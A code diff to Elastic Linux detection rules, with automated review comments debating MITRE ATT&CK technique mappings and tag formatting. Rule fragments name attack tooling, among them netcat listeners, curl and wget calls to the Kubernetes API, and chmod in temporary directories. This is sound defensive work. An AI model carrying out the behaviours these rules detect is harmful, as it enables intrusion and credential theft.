@@ -132,18 +132,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml index 63b6636a9ca..21393246708 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
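Review bot: Blank-line handling in the first hunk is inconsistent with the sibling rules in this change: the blank between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]` is deleted, and an empty `+` line is appended after the final `reference`, so the file now ends with a blank line. The other rule files keep the separator blank and end on the last `reference` line; restore the one after `framework` and drop the trailing one. The technique swap itself (T1203 for a print-daemon rule) raises the same question as the lp_user rule about whether T1190 should stay.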
@@ -103,7 +103,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -137,31 +148,14 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like ( [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + 
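Review bot: The second hunk ends the file with an added empty `+` line after `reference = "https://attack.mitre.org/tactics/TA0002/"` and drops the blank between `framework = "MITRE ATT&CK"` and the technique table, the opposite of the layout the other rule files use; keep the in-file blank and remove the trailing one. Separately, the deleted T1105 Ingress Tool Transfer entry was the only mapping for any download-style child the rule's `process.command_line like (` clause matches — the patterns are outside the hunk, so confirm none of them are transfer commands before dropping both the entry and the `"Tactic: Command and Control"` tag removed in the first hunk.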
diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml index a1c87d57ec2..4f987d0a01c 100644 --- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml +++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ Containers, often used for deploying applications, start with an entrypoint scri risk_score = 47 rule_id = "c75d0c86-38d6-4821-98a1-465cff8ff4c8" severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -78,19 +86,6 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
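Review bot: The rewritten `tags` array drops `"Tactic: Command and Control"` but does not add `"Tactic: Privilege Escalation"`, even though the last hunk of this same file adds a `[rule.threat.tactic]` with `id = "TA0004"` / `name = "Privilege Escalation"`. The `Tactic:` tags are presumably expected to mirror rule.threat, so add `"Tactic: Privilege Escalation",` after `"Tactic: Execution",`. Removing the C2 tag is consistent with the T1071/TA0011 entry deleted in the following hunk.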
@@ -105,3 +100,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index e06b6cc1346..db15ac7e5ad 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/22" [rule] author = ["Elastic"] @@ -88,3 +88,20 @@ In Linux environments, processes with executable stacks can pose security risks - Implement stack protection mechanisms such as stack canaries or non-executable stack configurations to prevent future exploitation. - Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index 4b8060d9d8e..d2a3a87c967 100644 
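Review bot: The threat block added to the executable-stack rule asserts the T1059.004 Unix Shell sub-technique, but nothing in the hunk ties an executable stack to a shell — the surrounding note talks about processes running with executable stacks and about stack canaries and non-executable stack configuration, i.e. binary hardening. If an Execution mapping is wanted, the bare parent `T1059` is the safer claim, or the note should say why a shell is implied. Also separate the closing `"""` of `note` from `[[rule.threat]]` with a blank line as the other rule files do, and confirm the file's `tags` (outside this hunk) now carry `"Tactic: Execution"`.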
--- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, user.id with maxspan=1m @@ -102,37 +109,6 @@ sequence by host.id, user.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
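Review bot: Deleting the T1070.004 File Deletion / Defense Evasion entry in the last hunk removes the mapping for the half of the behaviour this rule exists to catch — the file is `execution_file_execution_followed_by_deletion.toml` and its query is a `sequence by host.id, user.id with maxspan=1m`, so the deletion is the defining step, not incidental. Keep `id = "T1070"` / `id = "T1070.004"` under `id = "TA0005"` and restore `"Tactic: Defense Evasion"` in `tags` (removed in the previous hunk). Dropping T1105 is more defensible since no download step is visible, but the sequence body is outside the hunk, so check it.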
diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 79c6860fe6c..18431eba5ca 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -92,6 +100,19 @@ process.args like ("/dev/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 717371ec75b..59cdf65a41e 100644 
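Review bot: The new `[[rule.threat]]` in the last hunk maps a `chmod` on paths under `/dev/shm`, `/tmp`, `/var/tmp`, `/run` to T1059 Command and Scripting Interpreter, but changing a file's mode is not interpreter execution; the T1222 entry the hunk keeps is the technique that describes the event, and any execution that follows is a separate event. If the Execution entry is kept, say why, and be consistent with the other rules in this change, which add the `T1059.004` sub-technique rather than the bare parent. The `"Tactic: Execution"` tag added in the previous hunk does match the new tactic.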
--- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/15" [rule] author = ["Elastic"] @@ -116,7 +116,18 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -136,24 +147,6 @@ process.args like~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -168,16 +161,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 28f2960a711..7358ddd13d1 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] 
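Review bot: The first hunk removes the T1095/T1105 Command and Control entry and the second removes the T1048 Exfiltration entry, leaving a rule named `file_transfer_or_listener_established_via_netcat` mapped only to T1059.004 Unix Shell — netcat is not a shell, and the remaining mapping describes neither the transfer nor the listener in the rule's name. Unless the detection logic was narrowed at the same time (the `process.args like~ (` patterns are outside the hunk), keep the T1105/T1095 entry under `id = "TA0011"` and the T1048 entry under `id = "TA0010"`, and restore the `"Tactic: Command and Control"` and `"Tactic: Exfiltration"` tags removed in the earlier hunk.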
@@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" - [[rule.threat.technique]] id = "T1610" name = "Deploy Container" reference = "https://attack.mitre.org/techniques/T1610/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 228072a8a57..15462abd9f1 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] 
@@ -91,7 +91,22 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,19 +127,19 @@ process.name in ("curl", "wget") and process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1552.007" -name = "Container API" -reference = "https://attack.mitre.org/techniques/T1552/007/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" 
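Review bot: The last element of the rewritten `tags` array, `"Resources: Investigation Guide"`, has no trailing comma, whereas every other rewritten `tags` array in this change ends its last element with one; write `"Resources: Investigation Guide",` then `]` so the arrays are formatted uniformly. Swapping `"Tactic: Credential Access"` for `"Tactic: Execution"` matches the tactic change in the next hunk, so tags and tactics stay in sync.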
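Review bot: Replacing T1552.007 Container API (Credential Access) with T1059.004 Unix Shell weakens the mapping of the second hunk: the hunk header shows the rule fires on `process.name in ("curl", "wget")` calling the Kubernetes API, which is what T1552.007 names, while curl and wget are not Unix shells. If an Execution mapping is also wanted, keep `id = "T1552"` / `id = "T1552.007"` under `id = "TA0006"` as a second `[[rule.threat]]` rather than dropping it, and restore `"Tactic: Credential Access"` in `tags`. The Discovery entry that follows is unchanged context.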
diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index 0e630db8bb7..7e6e8f09bbf 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -91,7 +91,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -105,11 +115,16 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index 3ad4d30131f..b094488daa9 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -43,7 +43,15 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
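Review bot: The rewritten `tags` array in the last hunk keeps only `"Tactic: Execution"`, but the next hunk of this file adds a `[rule.threat.tactic]` with `id = "TA0011"` / `name = "Command and Control"`, so the tag for that tactic is missing. Add `"Tactic: Command and Control",` after `"Tactic: Execution",` so the tags mirror rule.threat. Dropping `"Tactic: Defense Evasion"` is consistent with the T1620/TA0005 entry being replaced in that hunk.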
@@ -94,24 +102,29 @@ In Linux environments, the `mprotect()` system call adjusts memory permissions, framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1620" -name = "Reflective Code Loading" -reference = "https://attack.mitre.org/techniques/T1620/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 1ab588e751b..42342789d2f 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
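Review bot: Dropping T1620 Reflective Code Loading for T1059.004 Unix Shell removes the technique the rule's own description supports — the hunk header says it is about `mprotect()` adjusting memory permissions, which is closer to in-memory code loading than to shell interpretation, and no shell is visible in the hunk. The new T1071 Application Layer Protocol entry likewise asserts a protocol the hunk shows no check for, while the removed T1106 Native API (the `mprotect()` syscall) was the closer Execution technique. Suggest keeping `id = "T1620"` under `id = "TA0005"` and `id = "T1106"` under `id = "TA0002"`, and whichever tactics remain must be reflected in `tags` (the tag hunk above lists only Execution).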
@@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=1m 
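Review bot: The rewritten `tags` array lists only `"Tactic: Execution"`, but the threat hunk that follows in this file adds a `[rule.threat.tactic]` with `id = "TA0011"` / `name = "Command and Control"`, so `"Tactic: Command and Control",` must not be removed here. Removing `"Tactic: Defense Evasion"` does match the T1027.004/TA0005 entry deleted below, so only the C2 tag is out of step.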
@@ -106,29 +113,29 @@ In Linux environments, compiling and executing programs is routine for developme framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.004" -name = "Compile After Delivery" -reference = "https://attack.mitre.org/techniques/T1027/004/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index 24093ae8322..fdf0986337e 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] 
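Review bot: Deleting T1027.004 Compile After Delivery drops the technique that names this rule's behaviour — the file is `execution_network_event_post_compilation.toml` and the hunk header reads "compiling and executing programs" — in favour of T1059.004 Unix Shell, for which the hunk shows no shell. The swap of T1095 for T1071 also changes which network layer is claimed without any visible protocol check. Keep `id = "T1027"` / `id = "T1027.004"` under `id = "TA0005"` together with the `"Tactic: Defense Evasion"` tag, and add the Execution entry alongside rather than instead.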
@@ -130,11 +130,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index d875a90451b..c3d550b7b8b 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -87,7 +87,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
